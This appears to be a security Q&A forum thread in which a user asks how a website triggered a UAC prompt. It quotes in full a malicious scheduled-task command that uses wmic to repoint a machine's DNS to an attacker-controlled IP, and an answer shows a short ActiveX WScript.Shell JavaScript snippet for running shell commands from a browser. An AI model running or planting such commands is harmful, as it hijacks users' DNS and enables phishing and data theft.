3

Some time ago while visiting some web site in Opera 12.12 following Windows 7 UAC prompt appeared on screen:

C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")

Obviously, I declined it.

The method by which phishers attempted to get my data is pretty clear, but how they did manage to execute the command from browser?

Paul
  • 986

1 Answers1

2

Phishers may use Javascript like this:

var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);

It works only if you turn off the security features in your browser which will need to use ActiveX.

Leo Chapiro
  • 15,705